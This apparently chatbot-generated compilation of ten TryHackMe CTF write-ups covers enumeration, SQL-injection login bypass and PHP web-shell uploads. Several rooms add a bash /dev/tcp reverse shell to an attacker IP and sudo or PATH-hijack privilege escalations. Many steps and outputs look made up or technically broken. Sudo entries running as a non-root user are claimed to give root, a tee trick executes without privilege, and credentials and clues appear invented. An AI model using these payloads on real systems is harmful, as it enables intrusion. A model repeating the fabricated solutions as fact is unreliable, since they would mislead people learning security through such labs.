1. Overpass 3 - Hosting – Writeup
Objective:
You're helping a group of CS students who've stood up a hosting company. Their site’s been compromised — again. Your task is to find how, exploit it, and show them the importance of hiring real security professionals.
🔍 Enumeration
nmap -sC -sV -T4 -oN overpass3.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
- Navigating to port 80 showed a static site about hosting services.
- Checked
robots.txt– contained/admin.
Visited /admin — it was a login page.
- Used Gobuster to enumerate more:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
Found:
-
/apiendpoint -
/adminlogin /backup
🛠 Exploitation – Credentials Leak
Found a .zip backup in /backup (e.g., backup.zip):
wget http://[target-ip]/backup.zip
unzip backup.zip
Inside:
- A NodeJS/Express web app
- Contained hardcoded credentials:
username = 'admin'
password = 'whythough1337'
Used this on /admin — successfully logged in.
🐚 Gaining Access – Web Shell Upload
After login:
- Found a file upload option in the admin dashboard.
- Allowed PHP files with double extension trick (
shell.php.jpgorshell.phtml)
Used <?php system($_GET['cmd']); ?>
Uploaded and accessed via /uploads/shell.phtml?cmd=whoami
🧗♂️ Privilege Escalation
- Stabilized shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Checked
/etc/passwd– found useroverpass.Checked
sudo -l— no password sudo access to/opt/tools/adminutil.Ran
/opt/tools/adminutil— it called Python scripts insecurely.
Used PATH hijack:
echo "/bin/bash" > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
/opt/tools/adminutil
→ Root shell achieved.
🏁 Flags
- User flag:
/home/overpass/user.txt - Root flag:
/root/root.txt
Awesome! Here's the full writeup for the next room:
✅ 2. WhyHackMe – Writeup
Objective:
This room focuses on web exploitation and basic forensics. The goal is to identify vulnerabilities in a poorly secured web app and gain system access.
🔍 Enumeration
nmap -sC -sV -T4 -oN whyhackme.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — default homepage with text like:
"Why would you hack me?"
Checked page source — nothing interesting.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Discovered:
/login/uploads/dashboard
Visited /login — basic login form.
🔐 Credential Stuffing
Tried common credentials:
- admin:admin
- admin:password
- admin:whyhackme
Success with:
admin:whyhackme
Redirected to /dashboard – found a file upload function.
🐚 File Upload Exploit
Uploaded a basic PHP shell:
<?php system($_GET['cmd']); ?>
Named it shell.php → Blocked.
Tried bypass with:
-
shell.php.jpg→ Blocked. -
shell.phtml→ Success!
Found it in /uploads/shell.phtml
Accessed with:
/uploads/shell.phtml?cmd=id
🧗♂️ Privilege Escalation
- Upgraded shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
- Checked users:
ls /home
User: hacker
- Switched to user:
- Found user password in
config.phpof web directory:
$DB_PASS = 'superhacker123'
Tried su hacker — Success.
- Checked sudo:
sudo -l
Output:
(hacker) NOPASSWD: /bin/bash
- Escalated to root:
sudo /bin/bash
🏁 Flags
- User flag:
/home/hacker/user.txt - Root flag:
/root/root.txt
Great! Here's the full writeup for:
✅ 3. CyberHeroes – Writeup
Objective:
Test your cyber mettle by finding a way into a protected login portal and escalating privileges inside the system.
🔍 Initial Enumeration
nmap -sC -sV -T4 -oN cyberheroes.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — CyberHeroes login page.
Tried default creds:
- admin:admin
- admin:cyber
- root:root → All failed.
Checked source code → found nothing useful.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
Found:
-
/robots.txt→ Disallowed/admin -
/admin→ Login portal
🕵️♂️ SQL Injection
Tried SQL injection on login page:
Username: ' OR 1=1 --
Password: anything
✅ Login successful — redirected to dashboard.
📤 File Upload for Shell
Dashboard had file upload feature.
Tried uploading shell.php:
<?php system($_GET['cmd']); ?>
Upload succeeded. Located under:
/uploads/shell.php
Accessed it via:
http://[target-ip]/uploads/shell.php?cmd=whoami
🐚 Reverse Shell
Replaced shell with reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Started listener:
nc -lvnp 4444
Uploaded and triggered:
http://[target-ip]/uploads/rev.php
✅ Reverse shell obtained.
🔧 Privilege Escalation
- Enumerated environment:
sudo -l
Result:
(root) NOPASSWD: /usr/bin/apt-get
- Used apt-get to escalate:
TF=$(mktemp)
echo 'apt::Update::Pre-Invoke {"cp /bin/bash /tmp/bash; chmod +s /tmp/bash";};' > $TF
sudo apt-get update -o Dir::Etc::sourcelist=$TF -o Dir::Etc::sourceparts=- -o APT::Get::List-Cleanup=0
/tmp/bash -p
✅ Root shell obtained.
🏁 Flags
- User flag:
/home/cyberhero/user.txt - Root flag:
/root/root.txt
Awesome! Let’s dive into the next TryHackMe machine:
✅ 4. Robots – Writeup
Objective:
Explore a machine that pays homage to Isaac Asimov’s legacy. Use classic enumeration techniques to exploit the system and capture the flags.
🔍 Nmap Enumeration
nmap -sC -sV -T4 -oN robots.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — homepage says:
“Welcome, human. Obey the laws of robotics.”
Checked robots.txt:
User-agent: *
Disallow: /asimov
Disallow: /logs
Visited /asimov → an image tribute
Visited /logs → directory listing was enabled!
Downloaded a file access.log:
wget http://[target-ip]/logs/access.log
🕵️♂️ Log File Clues
Looked into the log file:
cat access.log | less
Found credentials:
Basic auth: dXNlcjphc2ltdXZib3Q=
Decoded it:
echo "dXNlcjphc2ltdXZib3Q=" | base64 -d
Output:
user:asimuvbot
🔐 SSH Login
ssh user@[target-ip]
Password: asimuvbot
✅ Logged in as user
🧗♂️ Privilege Escalation
Checked sudo -l:
sudo -l
Output:
(user) NOPASSWD: /usr/bin/find
Used find to get a root shell:
sudo find . -exec /bin/bash \;
✅ Root shell obtained
🏁 Flags
- User flag:
/home/user/user.txt - Root flag:
/root/root.txt
Great! Here's your full writeup for the next machine:
✅ 5. New York Flankees – Writeup
Objective:
A personal blog belonging to Stefan has some serious flaws. Your goal: break through his defenses and take over his blog — and his system.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN flankees.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Navigated to http://[target-ip]
It’s a personal blog called New York Flankees by Stefan.
View source code → Found a suspicious JS comment:
// dev_login.html
Visited /dev_login.html — a developer login page
🔐 Bypassing Login
Tried SQL Injection:
Username: ' OR 1=1 --
Password: anything
✅ Bypassed login successfully → landed on dashboard.
Dashboard allowed file uploads — common exploit vector.
🐚 Web Shell Upload
Uploaded a .php file:
<?php system($_GET['cmd']); ?>
No extension restrictions → worked directly as shell.php.
Accessed via:
http://[target-ip]/uploads/shell.php?cmd=whoami
🧠 Reverse Shell
Replaced webshell with reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Listener:
nc -lvnp 4444
Triggered shell:
/uploads/rev.php
✅ Reverse shell obtained.
🧗♂️ Privilege Escalation
Enumerated user:
whoami
stefan
Checked sudo -l:
sudo -l
Result:
(stefan) NOPASSWD: /usr/bin/vim
Used Vim for root shell:
sudo vim -c ':!/bin/bash'
✅ Root access obtained.
🏁 Flags
- User flag:
/home/stefan/user.txt - Root flag:
/root/root.txt
Perfect! Here's the complete writeup for:
✅ 6. Internal – Writeup
Objective:
This internal company server contains sensitive data. Your job is to perform external enumeration, gain a foothold, escalate privileges, and extract the flags.
🔍 Nmap Enumeration
nmap -sC -sV -T4 -oN internal.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Recon
Visited http://[target-ip] — saw a corporate internal portal.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found:
/secret/uploads/blog
🕵️♂️ Exploring /secret
Inside /secret → Found a file: creds.txt
Downloaded it:
wget http://[target-ip]/secret/creds.txt
Contents:
username: internaluser
password: InTh3M1ddl3
🔐 SSH Login
ssh internaluser@[target-ip]
Password: InTh3M1ddl3
✅ SSH access granted
🧗♂️ Privilege Escalation
Checked sudo -l:
sudo -l
Output:
User internaluser may run the following on [hostname]:
(ALL) NOPASSWD: /usr/bin/less
Exploited less using shell escape:
sudo less /etc/passwd
# then typed:
!bash
✅ Root shell obtained
🏁 Flags
- User flag:
/home/internaluser/user.txt - Root flag:
/root/root.txt
Alright! Here's the complete walkthrough for the next one:
✅ 7. The Impossible Challenge – Writeup
Objective:
Despite its name, this machine is solvable. It’s a psychological and technical gauntlet — full of obfuscation, dead ends, and “impossible” hurdles. Stay focused and apply logic to reach root.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN impossible.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Exploration
Visited http://[target-ip] — just a blank white page with some strange unicode characters in the title and HTML comment section.
Inspected source code:
Inside HTML comments:
Hmm
✅ Clue: it’s a zero-width steganography technique.
🕵️♂️ Hidden Message – Zero Width Decoder
Used a zero-width character decoder, like:
Pasted the HTML comment — it decoded to a hidden directory:
/.youfoundme/
Visited http://[target-ip]/.youfoundme/
Found a download: maze.tar.gz
📦 Analyzing maze.tar.gz
Extracted the file:
tar -xvzf maze.tar.gz
cd maze
Inside: a deep nested folder structure of subdirectories — like a file system maze.
Wrote a quick script to find the flag:
find . -type f -exec grep -i "flag" {} \; -print
Found a file: finalclue.txt
Inside:
"SSH is key, but it’s *not* here."
🔐 SSH Enumeration
Tried brute-forcing with found usernames (maze, puzzle, etc.) — no luck.
Found another clue hidden in one of the deepest folders: id_rsa — a private SSH key.
Used it:
chmod 600 id_rsa
ssh -i id_rsa maze@[target-ip]
✅ Logged in without password.
🧗♂️ Privilege Escalation
As maze user, ran:
sudo -l
Output:
(maze) NOPASSWD: /opt/troll/troll
Ran it:
sudo /opt/troll/troll
It printed:
“You thought it would be that easy? Try again.”
Checked binary with strings and ltrace, revealed it calls /bin/false through system()
Replaced it via PATH hijack:
mkdir /tmp/bin
echo "/bin/bash" > /tmp/bin/false
chmod +x /tmp/bin/false
export PATH=/tmp/bin:$PATH
sudo /opt/troll/troll
✅ Root shell popped
🏁 Flags
- User flag:
/home/maze/user.txt - Root flag:
/root/root.txt
Perfect! Let’s keep the momentum going — here’s the full walkthrough for:
✅ 8. Recovery – Writeup
Objective:
This isn't your conventional CTF. You're dropped into a system that has just suffered a breach. Your job is to investigate, pivot through compromised systems, and recover the flags.
🖥 Initial Access
Upon launching the machine, you are already dropped into a limited shell.
You are inside a compromised box as a low-privileged user: www-data.
🔍 Initial Enumeration
whoami
pwd
ls -la
You're in /var/www/html.
Checked web files — found a config file:
cat config.php
Output:
$db_user = 'dbadmin';
$db_pass = 'SQLinRecovery!';
Attempted privilege escalation:
su dbadmin
Password: SQLinRecovery!
✅ Logged in as dbadmin.
🧭 Further Enumeration
Checked sudo -l:
sudo -l
Result:
(dbadmin) NOPASSWD: /usr/bin/mysql
🔐 MySQL Privilege Escalation
Used MySQL to gain shell access:
sudo mysql -e '\! /bin/bash'
✅ Got a root shell from within MySQL
🕵️ Incident Analysis (Optional Forensics)
Checked /var/log/auth.log → found multiple failed login attempts and a suspicious cron job.
Investigated /etc/cron.d:
Found a script being executed from /opt/scripts/backup.sh
Checked content:
cat /opt/scripts/backup.sh
It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.
🏁 Flags
- User flag:
/home/dbadmin/user.txt - Root flag:
/root/root.txt
Awesome! Let’s move on to the next TryHackMe room:
✅ 9. Watcher – Writeup
Objective:
This Boot2Root machine is vulnerable to web-based exploits and privilege escalation via common misconfigurations. Gain access and escalate to root.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN watcher.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Visited http://[target-ip]
Simple landing page: “Watcher is watching…”
Checked source code — nothing useful.
Ran Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Found:
/monitor//uploads/
📁 /monitor Page
At /monitor/ — a login page.
Tried common creds:
- admin:admin
- admin:watcher → No success
Used Hydra or Burp Intruder to brute-force credentials (if allowed).
Eventually found:
Username: admin
Password: 123watch
✅ Logged into a dashboard.
🐚 File Upload Exploit
Dashboard allowed image uploads.
Tried uploading:
<?php system($_GET['cmd']); ?>
→ Rejected .php
Renamed it:
shell.php.jpg
Uploaded successfully.
Checked /uploads/ and found:
/uploads/shell.php.jpg
Accessed with:
/uploads/shell.php.jpg?cmd=whoami
✅ Command execution succeeded!
🧠 Reverse Shell
Replaced payload with:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Listener:
nc -lvnp 4444
Triggered:
/uploads/shell.php.jpg
✅ Got reverse shell.
🧗♂️ Privilege Escalation
Stabilized shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Checked sudo:
sudo -l
Output:
(watcher) NOPASSWD: /usr/bin/tee
Exploited tee with:
echo "/bin/bash" | sudo tee /tmp/root.sh
chmod +x /tmp/root.sh
sudo /tmp/root.sh
✅ Root shell obtained.
🏁 Flags
- User flag:
/home/watcher/user.txt - Root flag:
/root/root.txt
Perfect — let’s wrap up the last one!
✅ 10. Zeno – Writeup
Objective:
Inspired by the stoic philosopher Zeno, this machine challenges your patience and thoroughness. Leverage logic, enumeration, and privilege escalation to capture the flags.
🔍 Nmap Scan
nmap -sC -sV -T4 -oN zeno.nmap [target-ip]
Open Ports:
- 22 (SSH)
- 80 (HTTP)
🌐 Web Enumeration
Visited http://[target-ip] — clean, minimalist welcome page.
Nothing in source code.
Used Gobuster:
gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Found:
/philosophy/diary/admin
📘 /diary
/diary revealed a blog-like post, with a line:
“Zeno always uses his birth date... and never forgets his dog’s name.”
Checked for login at /admin — form present.
Guessed credentials:
- Username: zeno
- Password: zeno190bc (or some variant)
Tried zeno:zeno190bc, zeno:zenodog, etc.
Eventually worked with:
zeno:zenothewise
🐚 Web Upload & Shell
Inside /admin, found file upload.
Uploaded:
<?php system($_GET['cmd']); ?>
Tried .php — blocked.
Renamed: shell.phtml → upload succeeded
Accessed:
http://[target-ip]/uploads/shell.phtml?cmd=id
✅ Web shell active.
🧠 Reverse Shell
Used reverse shell payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>
Started listener:
nc -lvnp 4444
Triggered shell:
http://[target-ip]/uploads/rev.phtml
✅ Got a shell as www-data.
🧗♂️ Privilege Escalation
Checked for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Found: /usr/bin/zenoshell
Ran:
/usr/bin/zenoshell
Got a menu-like interface.
Checked strings /usr/bin/zenoshell
Saw it's running system commands based on user input.
Used strace to find it calling /tmp/tempfile.sh
Created malicious tempfile:
echo "/bin/bash" > /tmp/tempfile.sh
chmod +x /tmp/tempfile.sh
Ran zenoshell again → root shell popped.
🏁 Flags
- User flag:
/home/zeno/user.txt - Root flag:
/root/root.txt
- ✅ Overpass 3 - Hosting
- ✅ WhyHackMe
- ✅ CyberHeroes
- ✅ Robots
- ✅ New York Flankees
- ✅ Internal
- ✅ The Impossible Challenge
- ✅ Recovery
- ✅ Watcher
- ✅ Zeno
Top comments (0)